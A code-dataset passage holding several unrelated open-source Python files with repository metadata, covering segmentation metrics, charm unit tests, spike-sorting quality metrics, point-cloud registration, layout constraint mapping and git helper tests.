2019-12-20T13:15:08.000Z
|
2020-01-02T15:49:16.000Z
|
import numpy as np
import os
import argparse
import tqdm
import pandas as pd
import SimpleITK as sitk
from medpy import metric
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--file_path', type=str, default='./results/abus_roi/0108_dice_1/')
args = parser.parse_args()
# save csv file to the current folder
if args.file_path[-1] == '/':
args.save = args.file_path[:-1] + '.csv'
else:
args.save = args.file_path + '.csv'
return args
def main():
args = get_args()
dsc_list = []
jc_list = []
hd_list = []
hd95_list = []
asd_list = []
filenames = os.listdir(args.file_path)
for filename in tqdm.tqdm(filenames):
gt_img = sitk.ReadImage(os.path.join(args.file_path, filename+'/gt.nii.gz'))
gt_volume = sitk.GetArrayFromImage(gt_img)
pre_img = sitk.ReadImage(os.path.join(args.file_path, filename+'/pred.nii.gz'))
pre_volume = sitk.GetArrayFromImage(pre_img)
dsc = metric.binary.dc(pre_volume, gt_volume)
jc = metric.binary.jc(pre_volume, gt_volume)
hd = metric.binary.hd(pre_volume, gt_volume, voxelspacing=(0.4, 0.4, 0.4))
hd95 = metric.binary.hd95(pre_volume, gt_volume, voxelspacing=(0.4, 0.4, 0.4))
asd = metric.binary.asd(pre_volume, gt_volume, voxelspacing=(0.4, 0.4, 0.4))
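        # hd, hd95 and asd are surface distances expressed in the physical units
        # implied by the assumed 0.4 x 0.4 x 0.4 voxel spacing; dsc and jc are unitless overlaps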
dsc_list.append(dsc)
jc_list.append(jc)
hd_list.append(hd)
hd95_list.append(hd95)
asd_list.append(asd)
df = pd.DataFrame()
df['name'] = filenames
df['dsc'] = np.array(dsc_list)
df['jc'] = np.array(jc_list)
df['hd'] = np.array(hd_list)
df['hd95'] = np.array(hd95_list)
df['asd'] = np.array(asd_list)
print(df.describe())
df.to_csv(args.save)
if __name__ == '__main__':
main()
| 29.33871
| 91
| 0.630566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 164
| 0.090159
|
a2513b451ec5004528a7e01bf0d9f3485e85254c
| 64
|
py
|
Python
|
integraph/core/__init__.py
|
nleguillarme/inteGraph
|
65faae4b7c16977094c387f6359980a4e99f94cb
|
[
"Apache-2.0"
] | null | null | null |
integraph/core/__init__.py
|
nleguillarme/inteGraph
|
65faae4b7c16977094c387f6359980a4e99f94cb
|
[
"Apache-2.0"
] | null | null | null |
integraph/core/__init__.py
|
nleguillarme/inteGraph
|
65faae4b7c16977094c387f6359980a4e99f94cb
|
[
"Apache-2.0"
] | null | null | null |
from .taxid import TaxId
from .uri import URIManager, URIMapper
| 21.333333
| 38
| 0.8125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
a253f668fac9338a8b6bc1ab3d03ebaeb0518c82
| 4,170
|
py
|
Python
|
unit_tests/test_swift_storage_context.py
|
coreycb/charm-swift-storage
|
c31991ab198d7b51b9a4f5744a1fcc1fef0bc1ef
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
unit_tests/test_swift_storage_context.py
|
coreycb/charm-swift-storage
|
c31991ab198d7b51b9a4f5744a1fcc1fef0bc1ef
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
unit_tests/test_swift_storage_context.py
|
coreycb/charm-swift-storage
|
c31991ab198d7b51b9a4f5744a1fcc1fef0bc1ef
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# Copyright 2016 Canonical Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from mock import MagicMock
from test_utils import CharmTestCase, patch_open
import lib.swift_storage_context as swift_context
TO_PATCH = [
'config',
'log',
'related_units',
'relation_get',
'relation_ids',
'unit_private_ip',
'get_ipv6_addr',
]
class SwiftStorageContextTests(CharmTestCase):
def setUp(self):
super(SwiftStorageContextTests, self).setUp(swift_context, TO_PATCH)
self.config.side_effect = self.test_config.get
def test_swift_storage_context_missing_data(self):
self.relation_ids.return_value = []
ctxt = swift_context.SwiftStorageContext()
self.assertEquals(ctxt(), {})
self.relation_ids.return_value = ['swift-proxy:0']
self.related_units.return_value = ['swift-proxy/0']
self.relation_get.return_value = ''
self.assertEquals(ctxt(), {})
def test_swift_storage_context_with_data(self):
self.relation_ids.return_value = []
ctxt = swift_context.SwiftStorageContext()
self.assertEquals(ctxt(), {})
self.relation_ids.return_value = ['swift-proxy:0']
self.related_units.return_value = ['swift-proxy/0']
self.relation_get.return_value = 'fooooo'
self.assertEquals(ctxt(), {'swift_hash': 'fooooo'})
def test_rsync_context(self):
self.unit_private_ip.return_value = '10.0.0.5'
ctxt = swift_context.RsyncContext()
ctxt.enable_rsyncd = MagicMock()
ctxt.enable_rsyncd.return_value = True
self.assertEquals({'local_ip': '10.0.0.5'}, ctxt())
self.assertTrue(ctxt.enable_rsyncd.called)
def test_rsync_context_ipv6(self):
self.test_config.set('prefer-ipv6', True)
self.get_ipv6_addr.return_value = ['2001:db8:1::1']
ctxt = swift_context.RsyncContext()
ctxt.enable_rsyncd = MagicMock()
ctxt.enable_rsyncd.return_value = True
self.assertEquals({'local_ip': '2001:db8:1::1'}, ctxt())
self.assertTrue(ctxt.enable_rsyncd.called)
def test_rsync_enable_rsync(self):
with patch_open() as (_open, _file):
ctxt = swift_context.RsyncContext()
_file.read.return_value = 'RSYNC_ENABLE=false'
ctxt.enable_rsyncd()
_file.write.assert_called_with('RSYNC_ENABLE=true')
_file.read.return_value = '#foo'
ctxt.enable_rsyncd()
_file.write.assert_called_with('RSYNC_ENABLE=true\n')
def test_swift_storage_server_context(self):
self.unit_private_ip.return_value = '10.0.0.5'
self.test_config.set('account-server-port', '500')
self.test_config.set('object-server-port', '501')
self.test_config.set('container-server-port', '502')
self.test_config.set('object-server-threads-per-disk', '3')
self.test_config.set('object-replicator-concurrency', '3')
self.test_config.set('account-max-connections', '10')
self.test_config.set('container-max-connections', '10')
self.test_config.set('object-max-connections', '10')
ctxt = swift_context.SwiftStorageServerContext()
result = ctxt()
ex = {
'container_server_port': '502',
'object_server_port': '501',
'account_server_port': '500',
'local_ip': '10.0.0.5',
'object_server_threads_per_disk': '3',
'object_replicator_concurrency': '3',
'account_max_connections': '10',
'container_max_connections': '10',
'object_max_connections': '10',
}
self.assertEquals(ex, result)
| 38.971963
| 76
| 0.664508
| 3,318
| 0.795683
| 0
| 0
| 0
| 0
| 0
| 0
| 1,390
| 0.333333
|
a2567fe63fe79e43c35228a0d120b319e330a8d1
| 5,956
|
py
|
Python
|
spiketoolkit/validation/quality_metric_classes/noise_overlap.py
|
ferchaure/spiketoolkit
|
0b1deea724f742797181bb4fe57270fdd84951c1
|
[
"MIT"
] | null | null | null |
spiketoolkit/validation/quality_metric_classes/noise_overlap.py
|
ferchaure/spiketoolkit
|
0b1deea724f742797181bb4fe57270fdd84951c1
|
[
"MIT"
] | null | null | null |
spiketoolkit/validation/quality_metric_classes/noise_overlap.py
|
ferchaure/spiketoolkit
|
0b1deea724f742797181bb4fe57270fdd84951c1
|
[
"MIT"
] | null | null | null |
import numpy as np
from copy import copy
from .utils.thresholdcurator import ThresholdCurator
from .quality_metric import QualityMetric
import spiketoolkit as st
import spikemetrics.metrics as metrics
from spikemetrics.utils import printProgressBar
from collections import OrderedDict
from sklearn.neighbors import NearestNeighbors
from .parameter_dictionaries import update_all_param_dicts_with_kwargs
class NoiseOverlap(QualityMetric):
installed = True # check at class level if installed or not
installation_mesg = "" # err
params = OrderedDict([('max_spikes_per_unit_for_noise_overlap', 1000), ('num_features', 10),
('num_knn', 6)])
curator_name = "ThresholdNoiseOverlaps"
def __init__(self, metric_data):
QualityMetric.__init__(self, metric_data, metric_name="noise_overlap")
if not metric_data.has_recording():
raise ValueError("MetricData object must have a recording")
def compute_metric(self, max_spikes_per_unit_for_noise_overlap, num_features, num_knn, **kwargs):
params_dict = update_all_param_dicts_with_kwargs(kwargs)
save_property_or_features = params_dict['save_property_or_features']
seed = params_dict['seed']
waveforms = st.postprocessing.get_unit_waveforms(
self._metric_data._recording,
self._metric_data._sorting,
unit_ids=self._metric_data._unit_ids,
max_spikes_per_unit=max_spikes_per_unit_for_noise_overlap,
**kwargs
)
if seed is not None:
np.random.seed(seed)
noise_overlaps = []
for i_u, unit in enumerate(self._metric_data._unit_ids):
if self._metric_data.verbose:
printProgressBar(i_u + 1, len(self._metric_data._unit_ids))
wfs = waveforms[i_u]
times = self._metric_data._sorting.get_unit_spike_train(unit_id=unit)
if len(wfs) > max_spikes_per_unit_for_noise_overlap:
                # randomly subsample the extracted waveforms down to the configured cap
                selected_idxs = np.random.choice(len(wfs), size=max_spikes_per_unit_for_noise_overlap, replace=False)
                wfs = wfs[selected_idxs]
# get clip_size from waveforms shape
clip_size = wfs.shape[-1]
num_clips = len(wfs)
min_time = np.min(times)
max_time = np.max(times)
times_control = np.random.choice(np.arange(min_time, max_time), size=num_clips)
clips = copy(wfs)
clips_control = np.stack(self._metric_data._recording.get_snippets(snippet_len=clip_size,
reference_frames=times_control))
template = np.median(wfs, axis=0)
max_ind = np.unravel_index(np.argmax(np.abs(template)), template.shape)
chmax = max_ind[0]
tmax = max_ind[1]
max_val = template[chmax, tmax]
weighted_clips_control = np.zeros(clips_control.shape)
weights = np.zeros(num_clips)
for j in range(num_clips):
clip0 = clips_control[j, :, :]
val0 = clip0[chmax, tmax]
weight0 = val0 * max_val
weights[j] = weight0
weighted_clips_control[j, :, :] = clip0 * weight0
noise_template = np.sum(weighted_clips_control, axis=0)
noise_template = noise_template / np.sum(np.abs(noise_template)) * np.sum(np.abs(template))
for j in range(num_clips):
clips[j, :, :] = _subtract_clip_component(clips[j, :, :], noise_template)
clips_control[j, :, :] = _subtract_clip_component(clips_control[j, :, :], noise_template)
all_clips = np.concatenate([clips, clips_control], axis=0)
num_channels_wfs = all_clips.shape[1]
num_samples_wfs = all_clips.shape[2]
all_features = _compute_pca_features(all_clips.reshape((num_clips * 2,
num_channels_wfs * num_samples_wfs)), num_features)
num_all_clips=len(all_clips)
distances, indices = NearestNeighbors(n_neighbors=min(num_knn + 1, num_all_clips - 1), algorithm='auto').fit(
all_features.T).kneighbors()
group_id = np.zeros((num_clips * 2))
group_id[0:num_clips] = 1
group_id[num_clips:] = 2
num_match = 0
total = 0
for j in range(num_clips * 2):
for k in range(1, min(num_knn + 1, num_all_clips - 1)):
ind = indices[j][k]
if group_id[j] == group_id[ind]:
num_match = num_match + 1
total = total + 1
pct_match = num_match / total
noise_overlap = 1 - pct_match
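            # noise_overlap is the fraction of nearest neighbours that cross between
            # spike clips and noise clips; values near 0.5 mean the unit's waveforms
            # are barely distinguishable from noise, values near 0 mean good isolation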
noise_overlaps.append(noise_overlap)
noise_overlaps = np.asarray(noise_overlaps)
if save_property_or_features:
self.save_property_or_features(self._metric_data._sorting, noise_overlaps, self._metric_name)
return noise_overlaps
def threshold_metric(self, threshold, threshold_sign, max_spikes_per_unit_for_noise_overlap,
num_features, num_knn, **kwargs):
noise_overlaps = self.compute_metric(max_spikes_per_unit_for_noise_overlap, num_features, num_knn, **kwargs)
threshold_curator = ThresholdCurator(sorting=self._metric_data._sorting, metric=noise_overlaps)
threshold_curator.threshold_sorting(threshold=threshold, threshold_sign=threshold_sign)
return threshold_curator
def _compute_pca_features(X, num_components):
u, s, vt = np.linalg.svd(X)
return u[:, :num_components].T
def _subtract_clip_component(clip1, component):
V1 = clip1.flatten()
V2 = component.flatten()
V1 = V1 - np.mean(V1)
V2 = V2 - np.mean(V2)
V1 = V1 - V2 * np.dot(V1, V2) / np.dot(V2, V2)
return V1.reshape(clip1.shape)
| 45.121212
| 121
| 0.631632
| 5,193
| 0.871894
| 0
| 0
| 0
| 0
| 0
| 0
| 266
| 0.044661
|
a256bf58e2a1c3f65c6795ace24758ddfe629807
| 1,397
|
py
|
Python
|
lib/spider/NewsSpider1.py
|
ardegra/standard.api
|
36856acf3820cfc33def26f9737d6a682fba94ee
|
[
"MIT"
] | null | null | null |
lib/spider/NewsSpider1.py
|
ardegra/standard.api
|
36856acf3820cfc33def26f9737d6a682fba94ee
|
[
"MIT"
] | null | null | null |
lib/spider/NewsSpider1.py
|
ardegra/standard.api
|
36856acf3820cfc33def26f9737d6a682fba94ee
|
[
"MIT"
] | null | null | null |
import json
import pymongo
import falcon
from bson import json_util
class NewsSpider1:
def __init__(self, **kwargs):
self.name = kwargs.get("name", None)
self.country = kwargs.get("country", None)
self.category = kwargs.get("category", None)
self.entryDateParser = kwargs.get("entryDateParser", None)
self.ignoreDomainList = kwargs.get("ignoreDomainList", None)
self.indexMaxPageNumber = kwargs.get("indexMaxPageNumber", None)
self.indexUrl = kwargs.get("indexUrl", None)
self.type = kwargs.get("type", None)
self.xpath = kwargs.get("xpath", None)
def from_document(self, document):
self.name = document["name"]
self.country = document["country"]
self.category = document["category"]
self.entryDateParser = document["entryDateParser"]
self.ignoreDomainList = document["ignoreDomainList"]
self.indexMaxPageNumber = document["indexMaxPageNumber"]
self.indexUrl = document["indexUrl"]
self.type = document["type"]
self.xpath = document["xpath"]
def to_dict(self):
return {
"name": self.name,
"country": self.country,
"category": self.category,
"entryDateParser": self.entryDateParser,
"ignoreDomainList": self.ignoreDomainList,
"indexMaxPageNumber": self.indexMaxPageNumber,
"indexUrl": self.indexUrl,
"type": self.type,
"xpath": self.xpath,
}
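# --- Editorial usage sketch (not part of the original module) ---
# The keyword constructor and to_dict() round-trip, which the surrounding falcon
# resource layer presumably relies on when (de)serializing spider configurations.
if __name__ == "__main__":
    _spider = NewsSpider1(name="example", country="id", category="news")
    assert NewsSpider1(**_spider.to_dict()).to_dict() == _spider.to_dict()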
| 32.488372
| 68
| 0.680029
| 1,326
| 0.949177
| 0
| 0
| 0
| 0
| 0
| 0
| 309
| 0.221188
|
a2575cc36e877edd1ee71f8adfedc976cf489a26
| 4,152
|
py
|
Python
|
core/global_registration.py
|
MichaelArbel/OT-sync
|
0b8308375b0064a9ada3f8741f04551a3ba29b63
|
[
"BSD-3-Clause"
] | 2
|
2021-04-04T22:49:06.000Z
|
2021-08-09T12:19:30.000Z
|
core/global_registration.py
|
hrheydarian/OT-sync
|
0b8308375b0064a9ada3f8741f04551a3ba29b63
|
[
"BSD-3-Clause"
] | null | null | null |
core/global_registration.py
|
hrheydarian/OT-sync
|
0b8308375b0064a9ada3f8741f04551a3ba29b63
|
[
"BSD-3-Clause"
] | 1
|
2021-08-09T12:19:03.000Z
|
2021-08-09T12:19:03.000Z
|
# Open3D: www.open3d.org
# The MIT License (MIT)
# See license file or visit www.open3d.org for details
# examples/Python/Advanced/global_registration.py
import open3d as o3d
import numpy as np
import copy
def draw_registration_result(source, target, transformation):
source_temp = copy.deepcopy(source)
target_temp = copy.deepcopy(target)
source_temp.paint_uniform_color([1, 0.706, 0])
target_temp.paint_uniform_color([0, 0.651, 0.929])
source_temp.transform(transformation)
o3d.visualization.draw_geometries([source_temp, target_temp])
def preprocess_point_cloud(pcd, voxel_size):
print(":: Downsample with a voxel size %.3f." % voxel_size)
pcd_down = pcd.voxel_down_sample(voxel_size)
radius_normal = voxel_size * 2
print(":: Estimate normal with search radius %.3f." % radius_normal)
pcd_down.estimate_normals(
o3d.geometry.KDTreeSearchParamHybrid(radius=radius_normal, max_nn=30))
radius_feature = voxel_size * 5
print(":: Compute FPFH feature with search radius %.3f." % radius_feature)
pcd_fpfh = o3d.registration.compute_fpfh_feature(
pcd_down,
o3d.geometry.KDTreeSearchParamHybrid(radius=radius_feature, max_nn=100))
return pcd_down, pcd_fpfh
def prepare_dataset(voxel_size):
print(":: Load two point clouds and disturb initial pose.")
source = o3d.io.read_point_cloud("../../TestData/ICP/cloud_bin_0.pcd")
target = o3d.io.read_point_cloud("../../TestData/ICP/cloud_bin_1.pcd")
trans_init = np.asarray([[0.0, 0.0, 1.0, 0.0], [1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, 0.0], [0.0, 0.0, 0.0, 1.0]])
source.transform(trans_init)
draw_registration_result(source, target, np.identity(4))
source_down, source_fpfh = preprocess_point_cloud(source, voxel_size)
target_down, target_fpfh = preprocess_point_cloud(target, voxel_size)
return source, target, source_down, target_down, source_fpfh, target_fpfh
def execute_global_registration(source_down, target_down, source_fpfh,
target_fpfh, voxel_size):
distance_threshold = voxel_size * 1.5
print(":: RANSAC registration on downsampled point clouds.")
print(" Since the downsampling voxel size is %.3f," % voxel_size)
print(" we use a liberal distance threshold %.3f." % distance_threshold)
result = o3d.registration.registration_ransac_based_on_feature_matching(
source_down, target_down, source_fpfh, target_fpfh, distance_threshold,
o3d.registration.TransformationEstimationPointToPoint(False), 4, [
o3d.registration.CorrespondenceCheckerBasedOnEdgeLength(0.9),
o3d.registration.CorrespondenceCheckerBasedOnDistance(
distance_threshold)
], o3d.registration.RANSACConvergenceCriteria(4000000, 500))
return result
def refine_registration(source, target, source_fpfh, target_fpfh, voxel_size):
distance_threshold = voxel_size * 0.4
print(":: Point-to-plane ICP registration is applied on original point")
print(" clouds to refine the alignment. This time we use a strict")
print(" distance threshold %.3f." % distance_threshold)
result = o3d.registration.registration_icp(
source, target, distance_threshold, result_ransac.transformation,
o3d.registration.TransformationEstimationPointToPlane())
return result
if __name__ == "__main__":
voxel_size = 0.05 # means 5cm for the dataset
source, target, source_down, target_down, source_fpfh, target_fpfh = \
prepare_dataset(voxel_size)
result_ransac = execute_global_registration(source_down, target_down,
source_fpfh, target_fpfh,
voxel_size)
print(result_ransac)
draw_registration_result(source_down, target_down,
result_ransac.transformation)
result_icp = refine_registration(source, target, source_fpfh, target_fpfh,
voxel_size)
print(result_icp)
draw_registration_result(source, target, result_icp.transformation)
| 44.170213
| 80
| 0.701108
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 747
| 0.179913
|
a257f947f9d83091dd668f62bb9fa0c75a8eafcd
| 2,698
|
py
|
Python
|
src/get_test_results.py
|
williamdjones/deep_protein_binding
|
10b00835024702b6d0e73092c777fed267215ca7
|
[
"MIT"
] | null | null | null |
src/get_test_results.py
|
williamdjones/deep_protein_binding
|
10b00835024702b6d0e73092c777fed267215ca7
|
[
"MIT"
] | null | null | null |
src/get_test_results.py
|
williamdjones/deep_protein_binding
|
10b00835024702b6d0e73092c777fed267215ca7
|
[
"MIT"
] | null | null | null |
import os
import argparse
import pandas as pd
import numpy as np
from sklearn.metrics import f1_score, r2_score
from tqdm import tqdm
parser = argparse.ArgumentParser()
parser.add_argument("--exp_dir", type=str, help="path to directory containing test results",
default="/scratch/wdjo224/deep_protein_binding/experiments")
parser.add_argument("--exp_name", type=str, help="name of the experiment to collect results", default="binding_debug")
parser.add_argument("--exp_type", type=str, help="indicate regression (reg) or classification (class)",
default="class")
parser.add_argument("--exp_epoch", type=int, help="which epoch to get results for", default=4)
args = parser.parse_args()
test_dict = {"path": [], "score": []}
test_list = []
print("reading test results...")
for root, dirs, files in tqdm(os.walk(args.exp_dir), total=len(os.listdir(args.exp_dir))):
if "test_results" in root and args.exp_name in root and "epoch{}".format(args.exp_epoch) in root:
process = root.split("/")[-1].split("_")[0]
test_df = pd.DataFrame({"idx": [], "pred": [], "true": [], "loss": []})
for file in os.listdir(root):
test_df = pd.concat([test_df, pd.read_csv(root + "/" + file, index_col=0)])
score = None
if args.exp_type == "class":
y_true = test_df.true.apply(lambda x: np.argmax(np.fromstring(x.strip("[ ]"), sep=" ", dtype=np.float32)))
y_pred = test_df.pred.apply(lambda x: np.argmax(np.fromstring(x.strip("[ ]"), sep=" ", dtype=np.float32)))
score = f1_score(y_pred=y_pred, y_true=y_true)
elif args.exp_type == "reg":
y_true = test_df.true.apply(lambda x: np.fromstring(x.strip("[ ]"), sep=" ", dtype=np.float32))
y_pred = test_df.pred.apply(lambda x: np.fromstring(x.strip("[ ]"), sep=" ", dtype=np.float32))
score = r2_score(y_pred=y_pred, y_true=y_true)
else:
raise Exception("not a valid output type")
test_list.append({"path": root, "score": score, "process": process})
print("finished reading. finding best result")
best_score = -9999999
best_idx = 0
for idx, test in tqdm(enumerate(test_list)):
if test["score"] > best_score:
best_score = test["score"]
best_idx = idx
best_test = test_list[best_idx]
print("best test results:\n score: {} \t process: {} \t path: {}".format(best_test["score"], best_test["process"],
best_test["path"]))
pd.DataFrame(test_list).sort_values(by="score", ascending=False).to_csv(
"/scratch/wdjo224/deep_protein_binding/"+args.exp_name+"_test_results.csv")
| 46.517241
| 118
| 0.636027
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 676
| 0.250556
|
a2595f5495569bfb18a30651ccf4bc3e61dec9b6
| 35
|
py
|
Python
|
analysis/Leo/scripts/__init__.py
|
data301-2020-winter2/course-project-group_1039
|
26d661a543ce9dcea61f579f9edbcde88543e7c3
|
[
"MIT"
] | 1
|
2021-02-09T02:13:23.000Z
|
2021-02-09T02:13:23.000Z
|
analysis/Leo/scripts/__init__.py
|
data301-2020-winter2/course-project-group_1039
|
26d661a543ce9dcea61f579f9edbcde88543e7c3
|
[
"MIT"
] | 31
|
2021-02-02T17:03:39.000Z
|
2021-04-13T03:22:16.000Z
|
analysis/Leo/scripts/__init__.py
|
data301-2020-winter2/course-project-group_1039
|
26d661a543ce9dcea61f579f9edbcde88543e7c3
|
[
"MIT"
] | 1
|
2021-03-14T05:56:16.000Z
|
2021-03-14T05:56:16.000Z
|
import scripts.project_functions
| 8.75
| 32
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
a25a29dc91019ce3281b5fcc6f7a268059eba344
| 8,278
|
py
|
Python
|
align/pnr/write_constraint.py
|
ALIGN-analoglayout/ALIGN-public
|
80c25a2ac282cbfa199bd21ad85277e9376aa45d
|
[
"BSD-3-Clause"
] | 119
|
2019-05-14T18:44:34.000Z
|
2022-03-17T01:01:02.000Z
|
align/pnr/write_constraint.py
|
ALIGN-analoglayout/ALIGN-public
|
80c25a2ac282cbfa199bd21ad85277e9376aa45d
|
[
"BSD-3-Clause"
] | 717
|
2019-04-03T15:36:35.000Z
|
2022-03-31T21:56:47.000Z
|
align/pnr/write_constraint.py
|
ALIGN-analoglayout/ALIGN-public
|
80c25a2ac282cbfa199bd21ad85277e9376aa45d
|
[
"BSD-3-Clause"
] | 34
|
2019-04-01T21:21:27.000Z
|
2022-03-21T09:46:57.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 13 14:50:24 2021
@author: kunal001
"""
import pathlib
import pprint
import json
import logging
from ..schema import constraint
logger = logging.getLogger(__name__)
pp = pprint.PrettyPrinter(indent=4)
class PnRConstraintWriter:
def __init__(self):
pass
def map_valid_const(self,all_const):
"""
Maps input format to pnr format
"""
logger.debug(f"input constraints {all_const}")
#Start mapping
pnr_const=[]
for input_const in constraint.expand_user_constraints(all_const):
# Create dict for PnR constraint
# and handle common field aliasing
const = input_const.dict(
exclude = {'constraint'},
exclude_unset=True)
const['const_name'] = input_const.__class__.__name__
if 'instances' in const:
const['blocks'] = const['instances']
del const['instances']
# Add dict to PnR constraint list
if not const['const_name'] in ('NetConst', 'PortLocation', 'MultiConnection'):
pnr_const.append(const)
# Constraint-specific field transformations
if const["const_name"] == 'Order':
const["const_name"] = 'Ordering'
if const["direction"] in ("left_to_right", "horizontal"):
const["direction"] = 'H'
elif const["direction"] in ("top_to_bottom", "vertical"):
const["direction"] = 'V'
else:
raise NotImplementedError(f'PnR does not support direction {const["direction"]} yet')
elif const["const_name"] == 'SameTemplate':
logger.info( f'found a SameTemplate: {const}')
elif const["const_name"] == 'MatchBlocks':
const["const_name"] = 'MatchBlock'
const['block1'] = const['blocks'][0]
const['block2'] = const['blocks'][1]
del const['blocks']
elif const["const_name"] == 'BlockDistance':
const["const_name"] = 'bias_graph'
const["distance"] = const.pop('abs_distance')
elif const["const_name"] == 'HorizontalDistance':
const["const_name"] = 'bias_Hgraph'
const["distance"] = const.pop('abs_distance')
elif const["const_name"] == 'VerticalDistance':
const["const_name"] = 'bias_Vgraph'
const["distance"] = const.pop('abs_distance')
elif const["const_name"] == 'AspectRatio':
const["const_name"] = 'Aspect_Ratio'
del const['subcircuit']
elif const["const_name"] == 'Boundary':
del const['subcircuit']
for key in ['max_width', 'max_height']:
if const[key] is None:
del const[key]
elif const["const_name"] == 'SymmetricBlocks':
const["const_name"] = 'SymmBlock'
const["axis_dir"] = const.pop("direction")
pairs = []
for blocks in const["pairs"]:
if len(blocks)==1:
temp = {
"type": "selfsym",
"block": blocks[0]
}
elif len(blocks)==2:
temp = {
"type":"sympair",
"block1":blocks[0],
"block2":blocks[1]
}
                    else:
                        logger.warning(f"invalid group for symmetry {blocks}")
                        continue
                    pairs.append(temp)
const["pairs"] = pairs
elif const["const_name"] == 'GroupCaps':
const["const_name"] = 'CC'
const["cap_name"] = const.pop("name").upper()
const["unit_capacitor"] = const.pop("unit_cap").upper()
const["size"] = const.pop("num_units")
const["nodummy"] = not const["dummy"]
const["cap_r"] = -1
const["cap_s"] = -1
del const["dummy"]
del const["blocks"]
elif const["const_name"] == 'Align':
const["const_name"] = 'AlignBlock'
if const['line'] not in ['h_bottom', 'h_top', 'v_right', 'v_left', 'v_center']:
raise NotImplementedError(f'PnR does not support edge {const["line"]} yet')
elif const["const_name"] == 'SymmetricNets':
const["const_name"] = 'SymmNet'
const["axis_dir"] = const.pop("direction")
if "pins1" in const and "pins2" in const:
pins1 = self._map_pins(const["pins1"])
pins2 = self._map_pins(const["pins2"])
del const["pins1"]
del const["pins2"]
else:
pins1 = [{"type": "dummy", "name": "dummy", "pin": None}]
pins2 = [{"type": "dummy", "name": "dummy", "pin": None}]
const['net1'] = {
"name": const['net1'],
"blocks": pins1}
const['net2'] = {
"name": const['net2'],
"blocks": pins2}
elif const["const_name"] == 'PortLocation':
for port in const["ports"]:
extra = {
"const_name" : 'PortLocation',
"location" : const["location"],
"terminal_name" : port
}
pnr_const.append(extra)
elif const["const_name"] == 'MultiConnection':
for net in const["nets"]:
extra = {
"const_name": 'Multi_Connection',
"multi_number": int(const["multiplier"]),
"net_name": net.upper() # TODO: Revert after case sensitivity is restored
}
pnr_const.append(extra)
elif const["const_name"] == 'NetConst':
for net in const["nets"]:
if 'shield' in const and 'criticality' in const and not const['shield'] == "None":
extra = {
"const_name" : 'ShieldNet',
"net_name" : net,
"shield_net" : const["shield"]
}
pnr_const.append(extra)
extra = {
"const_name" : 'CritNet',
"net_name" : net,
"priority" : const["criticality"]
}
pnr_const.append(extra)
elif 'shield' in const and not const['shield'] =="None":
extra = {
"const_name" : 'ShieldNet',
"net_name" : net,
"shield_net" : const["shield"]
}
pnr_const.append(extra)
elif 'criticality' in const and const['shield'] =="None":
extra = {
"const_name" : 'CritNet',
"net_name" : net,
"priority" : const["criticality"]
}
pnr_const.append(extra)
logger.debug(f"Const mapped to PnR const format {pnr_const}")
return {'constraints': pnr_const}
    def _map_pins(self, pins: list):
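        # split "instance/pin" strings into pin references; bare names are treated as terminals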
blocks=[]
for pin in pins:
if '/' in pin:
temp = {
"type":"pin",
"name":pin.split('/')[0],
"pin":pin.split('/')[1]
}
else:
temp = {
"type":"terminal",
"name":pin,
"pin":None
}
blocks.append(temp)
return blocks
| 42.451282
| 105
| 0.439841
| 8,002
| 0.966659
| 0
| 0
| 0
| 0
| 0
| 0
| 2,547
| 0.307683
|
a25a329785c9f77e159427cefe14e85a15f3128c
| 157
|
py
|
Python
|
ch02/number_eight.py
|
joy-joy/pcc
|
6c7d166a1694a2c3f371307aea6c4bdf340c4c42
|
[
"MIT"
] | null | null | null |
ch02/number_eight.py
|
joy-joy/pcc
|
6c7d166a1694a2c3f371307aea6c4bdf340c4c42
|
[
"MIT"
] | null | null | null |
ch02/number_eight.py
|
joy-joy/pcc
|
6c7d166a1694a2c3f371307aea6c4bdf340c4c42
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 9 00:00:43 2018
@author: joy
"""
print(5 + 3)
print(9 - 1)
print(2 * 4)
print(16//2)
| 13.083333
| 35
| 0.573248
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 102
| 0.649682
|
a25a47c51ab943aef82605acc3a660cf6ca5f070
| 7,042
|
py
|
Python
|
tests/test_git_factory.py
|
kostya0shift/SyncToGit
|
b3f2ec7e1167a0b032d4d40726de625d31a02354
|
[
"MIT"
] | 1
|
2015-03-14T15:33:12.000Z
|
2015-03-14T15:33:12.000Z
|
tests/test_git_factory.py
|
kostya0shift/SyncToGit
|
b3f2ec7e1167a0b032d4d40726de625d31a02354
|
[
"MIT"
] | null | null | null |
tests/test_git_factory.py
|
kostya0shift/SyncToGit
|
b3f2ec7e1167a0b032d4d40726de625d31a02354
|
[
"MIT"
] | null | null | null |
import os
from contextlib import ExitStack
from pathlib import Path
import pytest
from synctogit.git_factory import GitError, git_factory
def remotes_dump(remote_name, remote):
# fmt: off
return (
"%(remote_name)s\t%(remote)s (fetch)\n"
"%(remote_name)s\t%(remote)s (push)"
) % locals()
# fmt: on
def test_git_missing_dir(temp_dir):
d = str(Path(temp_dir) / "non-existing-dir")
with pytest.raises(GitError):
git_factory(d)
@pytest.mark.parametrize(
"remote_name, remote",
[
# fmt: off
("origin", None),
("angel", "git@github.com:KostyaEsmukov/SyncToGit.git"),
# fmt: on
],
)
def test_git_new_existing_empty_dir(call_git, temp_dir, remote_name, remote):
branch = "spooky"
d = str(Path(temp_dir) / "myrepo")
os.mkdir(d)
git_factory(d, branch=branch, remote_name=remote_name, remote=remote)
